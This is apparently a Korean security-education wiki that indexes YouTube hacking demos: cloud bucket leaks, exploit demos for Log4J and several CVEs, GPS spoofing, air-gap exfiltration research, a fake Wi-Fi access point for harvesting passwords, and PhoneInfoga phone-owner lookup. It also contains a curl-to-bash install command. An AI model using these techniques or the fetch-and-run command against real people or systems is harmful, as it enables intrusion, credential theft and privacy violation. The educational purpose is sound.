# \[Youtube : NetworkChuck] AWS S3 intro to cloud hacking (leaky buckets)

\[Youtube NetworkChuck]

## 제목 : AWS S3 intro to cloud hacking (leaky buckets)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

## 내용 :

> AWS S3 intro to cloud hacking (leaky buckets) 영상 자료 입니다.

{% embed url="<https://youtu.be/0kk6k-VdllM>" %}

### Youtube 바로가기 : [NetworkChuck](https://youtu.be/0kk6k-VdllM)

{% embed url="<https://doc.skill.or.kr>" %}
NHN Cloud 정보 사이트&#x20;
{% endembed %}

{% embed url="<https://ssv.skill.or.kr>" %}
취약점 진단 분석 평가 방법 사이트&#x20;
{% endembed %}


# \[Youtube : NetworkChuck] How to Hack a password // Windows Edition

\[Youtube NetworkChuck]

## 제목 : How to Hack a password // Windows Edition

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

## 내용 :

> How to Hack a password (Windows Edition) 영상 자료 입니다.

{% embed url="<https://youtu.be/L26Xq7m0uQ0>" %}

### Youtube 바로가기 : [NetworkChuck](https://www.youtube.com/@NetworkChuck)

{% embed url="<https://doc.skill.or.kr>" %}
NHN Cloud 정보 사이트&#x20;
{% endembed %}

{% embed url="<https://ssv.skill.or.kr>" %}
취약점 진단 분석 평가 방법 사이트&#x20;
{% endembed %}


# Log4J Exploit Demo

\[Youtube Data] Public Data - \[Log4J Exploit]

{% embed url="<https://paypal.me/shop2002>" %}
donation
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Log4J Exploit Demo&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

## 내용 :

> Log4J Exploit 시연 영상 입니다.

{% embed url="<https://www.youtube.com/watch?v=tJW204uZWPU>" %}

{% hint style="info" %}
클라우드 및 기술적 취약점 진단 분석/평가/방법 문서 공유 : [https://ssv.skill.or.kr ](<https://ssv.skill.or.kr >)
{% endhint %}

{% embed url="<https://paypal.me/shop2002>" %}
donation
{% endembed %}


# Exploitation of a Samsung Galaxy Note 10+ Zero-Click RCE Bug via MMS

\[Youtube Data] Public Data - \[Exploitation of a Samsung Galaxy Note 10+ Zero-Click RCE Bug via MMS]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Exploitation of a Samsung Galaxy Note 10+ Zero-Click RCE Bug via MMS&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

## 내용 :

> Exploitation of a Samsung Galaxy Note 10+ Zero-Click RCE Bug via MMS 시연 영상 입니다.

{% embed url="<https://www.youtube.com/watch?v=nke8Z3G4jnc>" %}

Github 참고 : [바로가기](https://github.com/googleprojectzero/SkCodecFuzzer/tree/master/mms_exploit)&#x20;

{% hint style="info" %}
클라우드 및 기술적 취약점 진단 분석/평가/방법 문서 공유 : [https://ssv.skill.or.kr ](<https://ssv.skill.or.kr >)
{% endhint %}


# GPS Spoofing w/ BladeRF - Software Defined Radio Series

\[Youtube Data] Public Data - \[GPS Spooging]

{% embed url="<https://paypal.me/shop2002>" %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : GPS Spoofing w/ BladeRF - Software Defined Radio Series

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> BladeRF 를 이용하여 핸드폰의 GPS 를 변조 하는 해킹 시 영상입니다.&#x20;

### Description :&#x20;

> In this video I show how to spoof our own GPS signal! This can be used to change our location, according to our mobile phone, which can be used in location aware games such as Pokemon Go. \
> \
> Note: Spoofing your location in Pokemon Go can get you banned from the servers.\
> \
> Hardware:\
> \- BladeRF (x40) - GPS Transmitter\
> \- Samsung Galaxy S6 - GPS Receiver\
> \
> Topics covered:\
> \- Switching to GPS Only mode on Android\
> \- Creating a static location GPS file\
> \- Running the BladeRF script\
> \- Checking the transmitted data in SDR#\
> \- Verifying that the GPS signal is working on Android\
> \- Using Google Maps to test the spoofed GPS signal\
> \
> Tools:\
> \- BladeRF (<http://nuand.com/>)\
> \- GPS-SDR-Sim (<https://github.com/osqzss/gps-sdr-sim>)\
> \- sdr# (sdrsharp, <http://airspy.com/download/> & <https://github.com/jmichelp/sdrsharp-bladerf>)\
> \
> Stay tuned and subscribe for more upcoming videos showing actual hacks!

{% embed url="<https://youtu.be/VAmbWwAPZZo>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://paypal.me/shop2002>" %}
donation
{% endembed %}


# find info on phone numbers with PhoneInfoga

\[Youtube Data] Public Data - \[PhoneInfoga -Tool]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : find info on phone numbers with PhoneInfoga

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### Description :    &#x20;

> PhoneInfoga is one of the most advanced tools to scan international phone numbers. It allows you to first gather standard information such as country, area, carrier and line type on any international phone number, then search for footprints on search engines to try to find the VoIP provider or identify the owner.

### Infomation : &#x20;

> Github : <https://github.com/sundowndev/PhoneInfoga>
>
> Home Page : <https://sundowndev.github.io/phoneinfoga/install/>
>
> ### Binary installation (recommended) <a href="#binary-installation-recommended" id="binary-installation-recommended"></a>
>
> Follow the instructions :
>
> * Go to [release page on GitHub](https://github.com/sundowndev/phoneinfoga/releases)
> * Choose your OS and architecture
> * Download the archive, extract the binary then run it in a terminal
>
> You can also do it from the terminal (UNIX systems only) :
>
> ```
> # Download latest release in the current directory
> curl -sSL https://raw.githubusercontent.com/sundowndev/phoneinfoga/master/support/scripts/install | bash
>
> # Check the binary
> ./phoneinfoga version
>
> # You can also install it globally
> sudo mv ./phoneinfoga /usr/bin/phoneinfoga
> ```
>
> To ensure your system is supported, please check the output of `echo "$(uname -s)_$(uname -m)"` in your terminal and see if it's available on the [GitHub release page](https://github.com/sundowndev/phoneinfoga/releases).
>
> ### Using Docker <a href="#using-docker" id="using-docker"></a>
>
> Info
>
> If you want to use the beta channel, you can use the `next` tag, it's updated directly from the master branch. But in most cases we recommend using [`latest`, `v2` or `stable` tags](https://hub.docker.com/r/sundowndev/phoneinfoga/tags) to only get release updates.
>
> #### From docker hub <a href="#from-docker-hub" id="from-docker-hub"></a>
>
> You can pull the repository directly from Docker hub
>
> ```
> docker pull sundowndev/phoneinfoga:latest
> ```
>
> Then run the tool
>
> ```
> docker run --rm -it sundowndev/phoneinfoga version
> ```
>
> #### Docker-compose <a href="#docker-compose" id="docker-compose"></a>
>
> You can use a single docker-compose file to run the tool without downloading the source code.
>
> ```
> version: '3.7'
>
> services:
>     phoneinfoga:
>       container_name: phoneinfoga
>       restart: on-failure
>       image: phoneinfoga:latest
>       command:
>         - "serve"
>       ports:
>         - "80:5000"
> ```
>
> #### From the source code <a href="#from-the-source-code" id="from-the-source-code"></a>
>
> You can download the source code, then build the docker images
>
> **Build**
>
> Build the image
>
> ```
> docker-compose build
> ```
>
> **CLI usage**
>
> ```
> docker-compose run --rm phoneinfoga --help
> ```
>
> **Run web services**
>
> ```
> docker-compose up -d
> ```
>
> **DISABLE WEB CLIENT**
>
> Edit `docker-compose.yml` and add the `--no-client` option
>
> ```
> # docker-compose.yml
> command:
>   - "serve"
>   - "--no-client"
> ```
>
> **Troubleshooting**
>
> All the output is sent to stdout, so it can be inspected by running:
>
> ```
> docker logs -f <container-id|container-name>
> ```

{% embed url="<https://youtu.be/6CnDdXVTxhU>" %}
시연 영상  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# BitWhisper - Jumping the Air-Gap with Heat

\[Youtube Data] Public Data - \[Air-Gap]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : BitWhisper - Jumping the Air-Gap with Heat&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### &#x20;내용 :&#x20;

> 서로 다른 네트워크에 연결 되고 근거리에 데스크탑이 있을때 하는 방법이며 한 데스크탑에서 열 방출을 하며 다른 데스크탑에 내장 된 열 센서를 사용하여 두 컴퓨터 사이의 에어 갭을 연결하여 통신 할 수 있습니다. 망분리가 되어 있어도 이 해킹에 대해서는 위험이 존재 합니다.

### &#x20;Description :

> A research by Mordechai Guri and Prof. Yuval Elovici from the Cyber Security Research Center @ Ben-Gurion University - BitWhisper: Covert Signaling Channel between Air-Gapped Computers using Thermal Manipulations. The full research paper can be found here <http://cyber.bgu.ac.il/blog/bitwhisper-heat-air-gap>

{% embed url="<https://youtu.be/EWRk51oB-1Y>" %}
시연  영상     &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# How to leak sensitive data from an isolated computer (air-gap) to a near by mobile phone

\[Youtube Data] Public Data - \[AirHopper]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : How to leak sensitive data from an isolated computer (air-gap) to a near by mobile phone - AirHopper

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> 이 연구의 주요 아이디어는 무선 주파수를 사용하여 컴퓨터의 비밀 데이터를 휴대 전화로 전송하는 것입니다. 휴대 전화는 일반적으로 FM 라디오 수신기가 장착되어 있으며 소프트웨어는 의도적으로 비디오 디스플레이 장치에서 라디오 방출을 생성 할 수 있음이 이미 알려져 있습니다. 컴퓨터 화면에서 예. 하지만 휴대 전화가 공격 모델에서 격리 된 컴퓨터 화면에서 방출되는 악의적으로 제작 된 무선 신호의 수신자로 간주되는 것은 이번이 처음입니다. AirHopper는 텍스트 및 바이너리 데이터를 실제 분리 된 컴퓨터에서 1-7 미터 거리의 휴대 전화로 13-60 Bps (초당 바이트 수)의 유효 대역폭으로 어떻게 추출 할 수 있는지 보여줍니다. 비밀 암호를 훔치는 정도.

### &#x20;Description :

> New research from the ben-gurion university cyber labs&#x20;
>
> <http://cyber.bgu.ac.il/content/how-leak-sensitive-data-isolated-computer-air-gap-near-mobile-phone-airhopper>
>
> [.](http://cyber.bgu.ac.il/content/how-leak-sensitive-data-isolated-computer-air-gap-near-mobile-phone-airhopper) - follow the story on @cyberlabsbgu

{% embed url="<https://youtu.be/2OzTWiGl1rM>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Fake Access Point + DNS SPOOFING (ETTERCAP) + Fake Website

\[Youtube Data] Public Data - \[Fake Access]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Fake Access Point + DNS SPOOFING (ETTERCAP) + Fake Website

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> Kali Linux 를 이용하여 Fake AP를 만들어 접속 하는 사용자가 facebook 에 접근 할 때 공격자가 만든 위조된 웹페이지로 이동하는 해킹 시현 영상입니다.&#x20;

### Description :&#x20;

> This tutorial will take you through the steps necessary to create a access point where you can redirect hosts to your fake website. The benefit of using this method is that you can easily steal passwords from any website that you want to fake.

{% embed url="<https://youtu.be/aOLxRhWa5TE>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Unlocking L.A.'s Traffic Grid: Phreaked Out (Episode 1)

\[Youtube Data] Public Data - \[IoT Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Unlocking L.A.'s Traffic Grid: Phreaked Out (Episode 1)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> IoT 보안을 생각하시는 분들이라면 이런 공격에 대해 생각해 보셔야 할 거 같습니다.

### Description :&#x20;

> In the debut episode of our three-part series titled "Phreaked Out," we took a retrospective look at one day in August of 2006, when two Los Angeles traffic engineers, Kartik Patel and Gabriel Murillo, remotely accessed the city's traffic control system and tampered with the light sequences at four main intersections of the city, as part of a labor union protest.
>
> Although there was little evidence of the attack, their alleged disruptions were reported to have triggered a state of gridlock that lasted days. In 2009, Patel and Murillo copped to the crime, which stood as a reminder that the city of Los Angeles, like countless other metropolises, relies on a certain degree of computerized and internet-connected control systems that are vulnerable to exploitation.

{% embed url="<https://youtu.be/hcoVMXLTQzw>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# How to Hack a Car: Phreaked Out (Episode 2)

\[Youtube Data] Public Data - \[IoT Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : How to Hack a Car: Phreaked Out (Episode 2)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> IoT 보안을 생각하시는 분들이라면 이런 공격에 대해 생각해 보셔야 할 거 같습니다.

### Description :&#x20;

> In this episode of "Phreaked Out," we met some of the top security researchers at the center of the car hacking world. The goal isn't to make people crash: They highlight security holes in order to highlight flaws in car technology, intended to pressure auto manufacturers to be a few steps ahead of their friendly foes.
>
> Information security researcher Mathew Solnik gave us a first-hand demonstration on how to wirelessly send commands to the car and remotely tell it what to do. With a little over a grand and about a month of work, Solnik found time outside of his full-time job to reverse-engineer a car's computer system to make it ready for a takeover.
>
> From his laptop, he was able to manipulate the car's engine, brakes and security systems by wirelessly tapping into the Controller Area Network, or CAN bus, network. Without getting too deep into the details—both for legal reasons and due to my own training-wheel knowledge of such things—he was able to do so by implementing some off-the-shelf chips, a third party telematic control unit, a GSM-powered wireless transmitter/receiver setup, and a significant amount of know-how he's accrued over the years.
>
> The reason for such additional hardware was to make our older, mid-sized sedan function like a newer—and arguably more vulnerable—stock vehicle, which these days often come with data connections. (We would have loved to tinker with the latest, most connected car on the market, but since we were on a shoestring budget and it's incredibly hard to find a friend who's willing to lend their car for a hacking experiment, our pickings were slim.)
>
> With that said, a car whose network system is connected to a cloud server and accessible by Bluetooth, cell networks, or wi-fi is potentially vulnerable to intrusion.

{% embed url="<https://youtu.be/3jstaBeXgAs>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# All The Ways To Hack Your Phone: Phreaked Out (Episode 3)

\[Youtube Data] Public Data - \[Phone Hacking]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : All The Ways To Hack Your Phone: Phreaked Out (Episode 3)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> IoT 보안을 생각하시는 분들이라면 이런 공격에 대해 생각해 보셔야 할 거 같습니다.

### Description :&#x20;

> Over the course of our "Phreaked Out" series, we've seen how devices such as urban control systems, moving vehicles, and smartphones are not impervious to hacks when connected to a network—cellular or wi-fi. In our third and final episode,we check out a slate of real-time phone hacks to tackle the question of mobile phone security.

{% embed url="<https://youtu.be/dysnKiXUlRU>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Hacking IoT Thermostats

\[Youtube Data] Public Data - \[IoT Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Hacking IoT Thermostats

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### &#x20;내용 : &#x20;

> 스마트 보이러를 익스플로잇 하여 온도를 변화 하는 IoT Hacking 영상 입니다.

### &#x20;Description :&#x20;

> Video of the live hacking demo from Infosecurity Europe 2016.&#x20;

{% embed url="<https://youtu.be/Op0tHjExST8?list=PLvoh_DqyixFdtcxDOYE_ezULgA5rNBEnc>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# WiFi IoT Hacking Demo Guide

\[Youtube Data] Public Data - \[Wifi Hacking]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : WiFi IoT Hacking Demo Guide

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> KALI Linux 를 이용하여 WiFi Hacking Demo 시 영상입니다.

{% embed url="<https://youtu.be/9SFyDtCJdMo>" %}
시연 영상     &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# How to Hack WPA/WPA2 Wi-Fi With Kali Linux Aircrack-ng

\[Youtube Data] Public Data - \[Wi-Fi Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : \[Youtube Data] Public Data - \[IoT Hack]

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> Aircrack-ng를 이용하여 무선 AP를 \[인증레벨중 : WPA/WPA2] 해킹 시현 영상 입니다.

{% embed url="<https://youtu.be/ngxzSlsP1JU>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Exploit CVE-2016-2521 DLL Hijacking Wireshark

\[Youtube Data] Public Data - \[DLL Hijacking]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Exploit CVE-2016-2521 DLL Hijacking Wireshark

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> DLL Hijacking exploit 입니다.

### Description :&#x20;

> A video demonstrating how to exploit this CVE. "riched20.dll.dll" can be coded so you don't have to call another DLL to execute your payload.

{% embed url="<https://youtu.be/_KX2vMXo3Hc>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# CVE-2016-4484 : Ubuntu16.04 Enter 30 to shell: Cryptsetup Initram Shell

\[Youtube Data] Public Data - \[Ubuntu16.04 Hacking]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : CVE-2016-4484 : Ubuntu16.04 Enter 30 to shell: Cryptsetup Initram Shell

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> Ubuntu 16.04 버전에서 엔터를 70초 이상 눌렀을때 로그인 되는 현상이 발생 됨.

{% embed url="<https://youtu.be/97KPe02aMDs>" %}
시연 영상  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# FATMAN CVE-2015-2545 Office 2007 Silent DOC Exploit Domo

\[Youtube Data] Public Data - \[DOC Exploit]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : FATMAN CVE-2015-2545 Office 2007 Silent DOC Exploit Domo

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> FATMAN Exploit Kit 을 사용하여 오피스 2007을 exploit 하여 외부 파일을 실행 하여 백도어나 바이러스를 삽입하는 해킹 시현 영상입니다.

{% embed url="<https://youtu.be/DmrV2FRB0iY>" %}
시연 영상   &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# CVE-2016-2384 proof-of-concept exploit demo

\[Youtube Data] Public Data - \[Exploit]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : CVE-2016-2384 proof-of-concept exploit demo

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> 공격자가 시스템에 일반 사용자로 접근 하여 exploit 을 실행 하여 root 권한을 획득 하는 방법 입니다.
>
> github 에 소스코드가 올라가 있으나 테스트 용으로 사용하시기 바랍니다.&#x20;
>
> 해결방안으로는 최신버전의 보안 업데이트 수행 하시기 바랍니다.

### Description&#x20;

> Overview
>
> This post describes an exploitable vulnerability (CVE-2016-2384) in the usb-midi Linux kernel driver. The vulnerability is present only if the usb-midi module is enabled, but as far as I can see many modern distributions do this. The bug has been fixed upstream.<br>
>
> The vulnerability can be exploited in two ways:<br>
>
> Denial of service. Requires physical access (ability to plug in a malicious USB device). All the kernel versions seem to be vulnerable to this attack. I managed to cause a kernel panic on real machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic), Fedora 22 (4.1.5-200.fe22.x86\_64) and CentOS 6 (2.6.32-584.12.2.e16.x86\_64).<br>
>
> Arbitrary code execution with ring 0 privileges (and therefore a privilege escalation). Requires both physical and local access (ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user). All the kernel versions starting from v3.0 seem to be vulnerable to this attack. I managed to gain root privileges on real machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic) and Fedora 22 (4.1.5-200.fe22.x86\_64). All machines had SMEP turned on, but didn't have SMAP.
>
> A proof-of-concept exploit (poc.c, poc.py) is provided for both types of attacks. The provided exploit uses a Facedancer21 board to physically emulate the malicious USB device. The provided exploit bypasses SMEP, but doesn't bypass SMAP (though it might be possible to do). It has about 50% success rate (the kernel crashes on failure), but this can probably be improved. Check out the demo video.

### Infomation :&#x20;

> CVE-2016-2384: <https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2384>
>
> Source Code : [https://github.com/xairy/CVE-2016-2384﻿](https://github.com/xairy/CVE-2016-2384)

{% embed url="<https://youtu.be/lfl1NJn1nvo>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Let's See What's Out There - Mapping the Wireless IOT

\[Youtube Data] Public Data - \[Wireless IOT Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Let's See What's Out There - Mapping the Wireless IOT

{% hint style="danger" %}
